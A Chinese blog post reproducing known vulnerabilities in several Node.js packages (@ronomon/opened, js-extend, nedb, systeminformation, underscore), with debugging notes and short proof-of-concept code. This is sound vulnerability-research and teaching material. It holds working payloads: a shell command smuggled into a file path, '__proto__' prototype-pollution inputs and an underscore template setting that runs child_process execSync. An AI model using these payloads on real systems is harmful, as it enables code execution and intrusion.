
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>最近的node的漏洞复现 - 月出从云</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="1. @ronomon/opened这个漏洞的原因诞生应该是最简单的哪一类了，官方给了个范例：
123456789101112var Opened = require(&amp;#x27;@ronomon/,"> 
    
    <link rel="alternative" href="atom.xml" title="月出从云" type="application/atom+xml"> 
    <link rel="icon" href="/img/1.ico"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">月出从云</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">最近的node的漏洞复现</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">最近的node的漏洞复现</h1>
        <div class="stuff">
            <span>六月 23, 2021</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/node/" rel="tag">node</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/rce/" rel="tag">rce</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="tag">原型链污染</a></li></ul>


        </div>
        <div class="content markdown">
            <h1 id="1-ronomon-opened"><a href="#1-ronomon-opened" class="headerlink" title="1. @ronomon/opened"></a>1. @ronomon/opened</h1><p>这个漏洞的原因诞生应该是最简单的哪一类了，官方给了个范例：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> Opened = <span class="built_in">require</span>(<span class="string">&#x27;@ronomon/opened&#x27;</span>);</span><br><span class="line"><span class="keyword">var</span> paths = [<span class="string">&quot;/etc/passwd/$(cat /flag)&quot;</span>];</span><br><span class="line">Opened.files(paths,</span><br><span class="line">  <span class="function"><span class="keyword">function</span>(<span class="params">error, hashTable</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (error) <span class="keyword">throw</span> error;</span><br><span class="line">    paths.forEach(</span><br><span class="line">      <span class="function"><span class="keyword">function</span>(<span class="params">path</span>) </span>&#123;</span><br><span class="line">        <span class="built_in">console</span>.log(path + <span class="string">&#x27; open=&#x27;</span> + hashTable[path]);</span><br><span class="line">      &#125;</span><br><span class="line">    );</span><br><span class="line">  &#125;</span><br><span class="line">);</span><br></pre></td></tr></table></figure>



<p>打个断点，直接就可以看见</p>
<p><img src="image-20210623155443495.png" alt="image-20210623155443495"></p>
<p>作者仅仅是对双引号进行了过滤，其他啥也没管，然后就命令执行，在这种情况下我们可以轻而易举的使用$()绕过。</p>
<p>getshell</p>
<p><img src="image-20210623155648977.png" alt="image-20210623155648977"></p>
<h1 id="2-js-extend"><a href="#2-js-extend" class="headerlink" title="2.js-extend"></a>2.js-extend</h1><p>这个的应该算是很常见的一个原型链污染的了，先整个官方的范例：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> extend = <span class="built_in">require</span>(<span class="string">&#x27;js-extend&#x27;</span>).extend</span><br><span class="line"> </span><br><span class="line"><span class="keyword">var</span> obj1 = &#123; <span class="attr">name</span>: <span class="string">&#x27;Jonny&#x27;</span> &#125;;</span><br><span class="line"><span class="keyword">var</span> obj2 = &#123; <span class="attr">lastName</span>: <span class="string">&#x27;Quest&#x27;</span> &#125;;</span><br><span class="line"> </span><br><span class="line">extend(obj1, obj2);</span><br><span class="line"><span class="built_in">console</span>.log(obj1);</span><br></pre></td></tr></table></figure>



<p>直接进去撸源码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> extend = <span class="function"><span class="keyword">function</span>(<span class="params">obj</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(<span class="keyword">typeof</span> obj !== <span class="string">&#x27;object&#x27;</span>) <span class="keyword">throw</span> obj + <span class="string">&#x27; is not an object&#x27;</span> ;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">var</span> sources = slice.call(<span class="built_in">arguments</span>, <span class="number">1</span>); </span><br><span class="line"></span><br><span class="line">  each.call(sources, <span class="function"><span class="keyword">function</span>(<span class="params">source</span>) </span>&#123;</span><br><span class="line">    <span class="function"><span class="title">if</span>(<span class="params">source</span>)</span> &#123;</span><br><span class="line">      <span class="function"><span class="title">for</span>(<span class="params"><span class="keyword">var</span> prop <span class="keyword">in</span> source</span>)</span> &#123;</span><br><span class="line">        <span class="function"><span class="title">if</span>(<span class="params"><span class="keyword">typeof</span> source[prop] === <span class="string">&#x27;object&#x27;</span> &amp;&amp; obj[prop]</span>)</span> &#123;</span><br><span class="line">          extend.call(obj, obj[prop], source[prop]);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">          obj[prop] = source[prop];</span><br><span class="line">        &#125;</span><br><span class="line">      &#125; </span><br><span class="line">    &#125;</span><br><span class="line">  &#125;);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> obj</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>







<p>稍微分析一下源码，可以理解为这段源码是怎么组合两个json数据的呢，首先使用slice将整个数组分开来，之后开始循环第二个数组，</p>
<p><img src="image-20210623180117467.png" alt="image-20210623180117467"></p>
<p>其中obj为第一个数组，sources为传入的第二个数组，然后进行遍历，做出来的操作为-》</p>
<p>如果遍历到的sources中的某个键为object，则递归的继续遍历这个数组，如果不是的话就直接将遍历到的key值的属性付给第一个数组。</p>
<p>这两个数组的话：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> obj1 = &#123; <span class="attr">name</span>: <span class="string">&#x27;Jonny&#x27;</span> &#125;;</span><br><span class="line"><span class="keyword">var</span> obj2 = &#123; <span class="attr">lastName</span>: <span class="string">&#x27;Quest&#x27;</span> &#125;;</span><br></pre></td></tr></table></figure>

<p>程序会尝试遍历第二个数组，之后将lastName属性赋值给obj1。其中对于obj2的属性名字没有做出任何过滤。在这种情况下，如果obj的数组为：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">__proto__</span>:&#123;<span class="attr">add</span>:<span class="string">&quot;123&quot;</span>&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>和下面的一段代码是等效的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">a = &#123;&#125;</span><br><span class="line">a[<span class="string">&#x27;__proto__&#x27;</span>][<span class="string">&#x27;polluted&#x27;</span>] = &#123;<span class="attr">polluted</span>:<span class="string">&quot;Yes! Its Polluted&quot;</span>&#125;[<span class="string">&#x27;polluted&#x27;</span>]</span><br><span class="line"><span class="built_in">console</span>.log(&#123;&#125;.polluted);</span><br></pre></td></tr></table></figure>



<p><img src="image-20210623182923978.png" alt="image-20210623182923978"></p>
<h1 id="3-nedb"><a href="#3-nedb" class="headerlink" title="3.nedb"></a>3.nedb</h1><p>这是一个轻量级的nosql数据库，嵌入式数据库，（其实就是个db文件）</p>
<p>具体使用情况如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> nedb = <span class="built_in">require</span>(<span class="string">&#x27;nedb&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> db = <span class="keyword">new</span> nedb(&#123;</span><br><span class="line">    filename: <span class="string">&#x27;./data/save.db&#x27;</span>,</span><br><span class="line">    autoload: <span class="literal">true</span></span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>这样就会创建一个数据库文件了，插入数据：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">db.insert(</span><br><span class="line">    [</span><br><span class="line">      &#123; <span class="attr">name</span>: <span class="string">&#x27;tom&#x27;</span> &#125;,</span><br><span class="line">      &#123; <span class="attr">name</span>: <span class="string">&#x27;jerry&#x27;</span> &#125;</span><br><span class="line">    ]</span><br><span class="line">  , <span class="function">(<span class="params">err, ret</span>) =&gt;</span> &#123;&#125;);</span><br></pre></td></tr></table></figure>

<p>查询数据：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">db.findOne(&#123;</span><br><span class="line">    name: <span class="string">&#x27;tom&#x27;</span></span><br><span class="line">  &#125;, <span class="function">(<span class="params">err, ret</span>) =&gt;</span> &#123;<span class="built_in">console</span>.log(ret);&#125;);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="image-20210623200407967.png" alt="image-20210623200407967"></p>
<p>查询的话则需要异步的来进行一个查询</p>
<p><img src="image-20210623200519003.png" alt="image-20210623200519003"></p>
<p>查询多项：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">db.find(&#123;</span><br><span class="line">    name: &#123;</span><br><span class="line">      $in: [<span class="string">&#x27;tom&#x27;</span>, <span class="string">&#x27;jerry&#x27;</span>]</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;)</span><br><span class="line">  .sort(&#123;</span><br><span class="line">    _id: -<span class="number">1</span></span><br><span class="line">  &#125;)</span><br><span class="line">  .exec(<span class="function">(<span class="params">err, ret</span>) =&gt;</span> &#123;&#125;);</span><br></pre></td></tr></table></figure>



<p>如果是查询多项，将会返回一个数组：</p>
<p><img src="image-20210623200635912.png" alt="image-20210623200635912"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">db.update(&#123;</span><br><span class="line">  _id: <span class="string">&#x27;1&#x27;</span></span><br><span class="line">&#125;, &#123;</span><br><span class="line">  $set: &#123;</span><br><span class="line">    name: <span class="string">&#x27;kitty&#x27;</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;, <span class="function">(<span class="params">err, ret</span>) =&gt;</span> &#123;&#125;);</span><br><span class="line"> </span><br></pre></td></tr></table></figure>

<p>更新某一项</p>
<p>后面的操作都是类似的，就不一一演示了</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">db.remove(&#123;</span><br><span class="line">  _id: <span class="string">&#x27;1&#x27;</span></span><br><span class="line">&#125;, <span class="function">(<span class="params">err, ret</span>) =&gt;</span> &#123;&#125;)</span><br><span class="line"> </span><br><span class="line"><span class="comment">// 删除多项</span></span><br><span class="line">db.remove(&#123;</span><br><span class="line">  name: <span class="string">&#x27;kitty&#x27;</span></span><br><span class="line">&#125;, &#123;</span><br><span class="line">  multi: <span class="literal">true</span></span><br><span class="line">&#125;, <span class="function">(<span class="params">err, ret</span>) =&gt;</span> &#123;&#125;);</span><br></pre></td></tr></table></figure>



<p>其实在这里使用set的时候就隐隐约约感觉不对了，果然是有洞的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> Datastore = <span class="built_in">require</span>(<span class="string">&quot;nedb&quot;</span>);</span><br><span class="line"><span class="keyword">const</span> db = <span class="keyword">new</span> Datastore();</span><br><span class="line">db.insert(&#123;<span class="attr">hello</span>: <span class="string">&#x27;world&#x27;</span>&#125;, <span class="function">(<span class="params">err</span>) =&gt;</span> &#123;</span><br><span class="line">    db.update(&#123;<span class="attr">hello</span>: <span class="string">&#x27;world&#x27;</span>&#125;, &#123;<span class="attr">$set</span>: &#123;<span class="string">&#x27;__proto__.polluted_1&#x27;</span>: <span class="literal">true</span>&#125;&#125;, &#123;&#125;, <span class="function">(<span class="params">err</span>) =&gt;</span> &#123;</span><br><span class="line">        <span class="built_in">console</span>.log((&#123;&#125;).polluted_1); <span class="comment">// true</span></span><br><span class="line">    &#125;);</span><br><span class="line">    db.update(&#123;<span class="attr">hello</span>: <span class="string">&#x27;world&#x27;</span>&#125;, &#123;<span class="attr">$set</span>: &#123;<span class="string">&#x27;constructor.prototype.polluted_2&#x27;</span>: <span class="literal">true</span>&#125;&#125;, &#123;&#125;, <span class="function">(<span class="params">err</span>) =&gt;</span> &#123;</span><br><span class="line">        <span class="built_in">console</span>.log((&#123;&#125;).polluted_2); <span class="comment">// true</span></span><br><span class="line">    &#125;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>我他妈直接开启F5进去调</p>
<p><img src="image-20210623213316885.png" alt="image-20210623213316885"></p>
<p>发现她的修改原理其实就是push代码..所以就出现了原型链的问题。</p>
<p>感觉这个很适合用于出题。。</p>
<h1 id="4-systeminformation"><a href="#4-systeminformation" class="headerlink" title="4.systeminformation"></a>4.systeminformation</h1><p>版本需求：</p>
<ul>
<li>小于5.6.4</li>
</ul>
<h2 id="si-inetLatency"><a href="#si-inetLatency" class="headerlink" title="si.inetLatency"></a>si.inetLatency</h2><p>老样子，根据范例随便写段东西然后F5开始调</p>
<p><img src="image-20210624101450880.png" alt="image-20210624101450880"></p>
<p>慢慢跟着走，能够发现关键函数：</p>
<p><img src="image-20210624102057003.png" alt="image-20210624102057003"></p>
<p>当我们是linux的时候，就会执行ping指令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\n64 bytes from 127.0.0.1: icmp_seq&#x3D;1 ttl&#x3D;64 time&#x3D;0.019 ms\n64 bytes from 127.0.0.1: icmp_seq&#x3D;2 ttl&#x3D;64 time&#x3D;0.023 ms\n\n--- 127.0.0.1 ping statistics ---\n2 packets transmitted, 2 received, 0% packet loss, time 1015ms\nrtt min&#x2F;avg&#x2F;max&#x2F;mdev &#x3D; 0.019&#x2F;0.021&#x2F;0.023&#x2F;0.002 ms\n&#39;</span><br></pre></td></tr></table></figure>



<p>重新下断点，可以看见有一个过滤函数：</p>
<p><img src="image-20210624102326703.png" alt="image-20210624102326703"></p>
<p>原本想试试看数组绕过的，结果发现还有这么一句话：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">typeof</span> host !== <span class="string">&#x27;string&#x27;</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (callback) &#123; callback(<span class="literal">null</span>); &#125;</span><br><span class="line">        <span class="keyword">return</span> resolve(<span class="literal">null</span>);</span><br><span class="line">      &#125;</span><br></pre></td></tr></table></figure>



<p>跟进可以发现过滤如下：</p>
<p><img src="image-20210624102338880.png" alt="image-20210624102338880"></p>
<p>感觉这个waf绕不过去，看看github上的提交</p>
<p><img src="image-20210624115015401.png" alt="image-20210624115015401"></p>
<p>可是感觉还是很安全，我没办法绕过这个函数。。。欸，后来又看到一个外国老哥的提交，给了我一些灵感，他是这样写的：</p>
<p><img src="image-20210625210515048.png" alt="image-20210625210515048"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> si = <span class="built_in">require</span>(<span class="string">&#x27;systeminformation&#x27;</span>);</span><br><span class="line">si.versions(&#123;<span class="attr">toString</span> : <span class="function">() =&gt;</span> &#123; <span class="built_in">console</span>.log(<span class="string">&quot;This is a PoC&quot;</span>) &#125;&#125;);</span><br></pre></td></tr></table></figure>

<p>其中提到，对类型的check不够，所以导致可能绕过。其中给出的版本为：小于5.6.11，先试试看——</p>
<p><img src="image-20210625211214086.png" alt="image-20210625211214086"></p>
<p>之后又栽在了这里，感觉很难受啊，这咋办呢。这个提醒了我toString，看看js的toString和PHP的是一个东西吗</p>
<p><img src="image-20210625211316818.png" alt="image-20210625211316818"></p>
<p>emmm</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> test = <span class="function">()=&gt;</span>&#123;</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">&#x27;123&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">console</span>.log(test);;</span><br><span class="line"><span class="built_in">console</span>.log(test.toString());</span><br></pre></td></tr></table></figure>

<p>这个会带有区别</p>
<p><img src="image-20210625212325559.png" alt="image-20210625212325559"></p>
<p>toString就是将一个对象打印出来，但是我们没办法去设定toString的方法，她也不会在我们类被当作字符串处理的时候自动调用，所以还是有区别的。</p>
<h1 id="5-underscore"><a href="#5-underscore" class="headerlink" title="5.underscore"></a>5.underscore</h1><h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><p><a target="_blank" rel="noopener" href="https://www.npmjs.org/package/underscore">underscore</a>是 JavaScript 的函数式编程助手库。</p>
<p>此软件包的受影响版本容易受到通过该<code>template</code>函数进行的任意代码注入的攻击，特别是当该<code>variable</code>选项<code>_.templateSettings</code>因未经过清理而被提取时。</p>
<h2 id="版本"><a href="#版本" class="headerlink" title="版本"></a>版本</h2><p>1.12.0</p>
<h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> _ = <span class="built_in">require</span>(<span class="string">&#x27;underscore&#x27;</span>);</span><br><span class="line">_.templateSettings.variable = <span class="string">&quot;a = this.process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;touch HELLO&#x27;)&quot;</span>;</span><br><span class="line"><span class="keyword">const</span> t = _.template(<span class="string">&quot;&quot;</span>)();</span><br></pre></td></tr></table></figure>



<h2 id="复现过程："><a href="#复现过程：" class="headerlink" title="复现过程："></a>复现过程：</h2><p>先翻一手官方文档，看看正常的情况是怎么用这个函数的：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> compiled = _.template(<span class="string">&quot;hello: &lt;%= name %&gt;&quot;</span>);</span><br><span class="line">compiled(&#123;<span class="attr">name</span>: <span class="string">&#x27;moe&#x27;</span>&#125;);</span><br></pre></td></tr></table></figure>



<p>官方给出的范例：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> _ = <span class="built_in">require</span>(<span class="string">&#x27;underscore&#x27;</span>);</span><br><span class="line"><span class="comment">// _.templateSettings.variable = &quot;a = this.process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;touch HELLO&#x27;)&quot;;</span></span><br><span class="line"><span class="comment">// const t = _.template(&quot;&quot;)();</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> compiled = _.template(<span class="string">&quot;hello: &lt;%= name %&gt;&quot;</span>);</span><br><span class="line">b =  compiled(&#123;<span class="attr">name</span>: <span class="string">&#x27;moe&#x27;</span>&#125;);</span><br><span class="line"><span class="built_in">console</span>.log(b);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> compiled = _.template(<span class="string">&quot;&lt;% print(&#x27;Hello &#x27; + epithet); %&gt;&quot;</span>);</span><br><span class="line">compiled(&#123;<span class="attr">epithet</span>: <span class="string">&quot;stooge&quot;</span>&#125;);</span><br></pre></td></tr></table></figure>

<p>感觉就和ejs很像，这个也是模板渲染函数，不管了走一个F5，单步调几下，很快就可以发现一个可疑的地方：</p>
<p><img src="image-20210624141041637.png" alt="image-20210624141041637"></p>
<p>这里直接new了 Fucntion( settings.variable ),若我们赋值了，则会形成这样的结果：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> <span class="title">anonymous</span>(<span class="params">a = <span class="built_in">this</span>.process.mainModule.<span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).execSync(<span class="string">&#x27;touch HELLO&#x27;</span>),_</span></span></span><br><span class="line"><span class="function"><span class="params"></span>) </span>&#123;</span><br><span class="line"><span class="comment">//var __t,__p=&#x27;&#x27;,__j=Array.prototype.join,print=function()&#123;__p+=__j.call(arguments,&#x27;&#x27;);&#125;;</span></span><br><span class="line"><span class="comment">//__p+=&#x27;&#x27;;</span></span><br><span class="line"><span class="comment">//return __p;</span></span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>直接造成了代码执行的结果，如果是未给settings.varibale赋值的情况，则是：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> <span class="title">anonymous</span>(<span class="params">obj,_</span></span></span><br><span class="line"><span class="function"><span class="params"></span>) </span>&#123;</span><br><span class="line"><span class="keyword">var</span> __t,__p=<span class="string">&#x27;&#x27;</span>,__j=<span class="built_in">Array</span>.prototype.join,print=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;__p+=__j.call(<span class="built_in">arguments</span>,<span class="string">&#x27;&#x27;</span>);&#125;;</span><br><span class="line"><span class="function"><span class="title">with</span>(<span class="params">obj||&#123;&#125;</span>)</span>&#123;</span><br><span class="line">__p+=<span class="string">&#x27;hello: &#x27;</span>+</span><br><span class="line">((__t=( name ))==<span class="literal">null</span>?<span class="string">&#x27;&#x27;</span>:__t)+</span><br><span class="line"><span class="string">&#x27;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> __p;</span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>



<p>这个指令很容易和原型链污染一起被执行，但是我又冒出了一个想法，难道一定要构造这样：</p>
<p> const t = _.template(“”)();</p>
<p>无参数才可以吗，利用官方的实例，我发现果然报错了</p>
<p><img src="image-20210624155655722.png" alt="image-20210624155655722"></p>
<p>跟踪打印之后发现了我的函数变成了这样子的一个情况:</p>
<p><img src="image-20210624162337376.png" alt="image-20210624162337376"></p>
<p>我和正常生成的函数进行一下对比：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> <span class="title">anonymous</span>(<span class="params">epithet = <span class="built_in">this</span>.process.mainModule.<span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>).execSync(<span class="string">&#x27;touch 1234&#x27;</span>),_</span></span></span><br><span class="line"><span class="function"><span class="params"></span>) </span>&#123;</span><br><span class="line"><span class="keyword">var</span> __t,__p=<span class="string">&#x27;&#x27;</span>,__j=<span class="built_in">Array</span>.prototype.join,print=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;__p+=__j.call(<span class="built_in">arguments</span>,<span class="string">&#x27;&#x27;</span>);&#125;;</span><br><span class="line">__p+=<span class="string">&#x27;&#x27;</span>;</span><br><span class="line"> print(<span class="string">&#x27;Hello &#x27;</span> + epithet); </span><br><span class="line">__p+=<span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">return</span> __p;</span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>



<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> <span class="title">anonymous</span>(<span class="params">obj,_</span></span></span><br><span class="line"><span class="function"><span class="params"></span>) </span>&#123;</span><br><span class="line"><span class="keyword">var</span> __t,__p=<span class="string">&#x27;&#x27;</span>,__j=<span class="built_in">Array</span>.prototype.join,print=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;__p+=__j.call(<span class="built_in">arguments</span>,<span class="string">&#x27;&#x27;</span>);&#125;;</span><br><span class="line"><span class="function"><span class="title">with</span>(<span class="params">obj||&#123;&#125;</span>)</span>&#123;</span><br><span class="line">__p+=<span class="string">&#x27;&#x27;</span>;</span><br><span class="line"> print(<span class="string">&#x27;Hello &#x27;</span> + epithet); </span><br><span class="line">__p+=<span class="string">&#x27;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> __p;</span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>



<p>发现少了一段with的函数</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;var __t,__p=&#x27;</span><span class="string">&#x27;,__j=Array.prototype.join,print=function()&#123;__p+=__j.call(arguments,&#x27;</span><span class="string">&#x27;);&#125;;\nwith(obj||&#123;&#125;)&#123;\n__p+=&#x27;</span><span class="string">&#x27;;\n print(&#x27;</span>Hello <span class="string">&#x27; + epithet); \n__p+=&#x27;</span><span class="string">&#x27;;\n&#125;\nreturn __p;\n&#x27;</span></span><br></pre></td></tr></table></figure>



<p>回看之后是在这个语句上添加的：</p>
<p><img src="image-20210624163056355.png" alt="image-20210624163056355"></p>
<p>这就很尴尬了，比较我又不能控制这段函数，只能在再想别的办法了</p>
<p>若无参数形成的函数如下：</p>
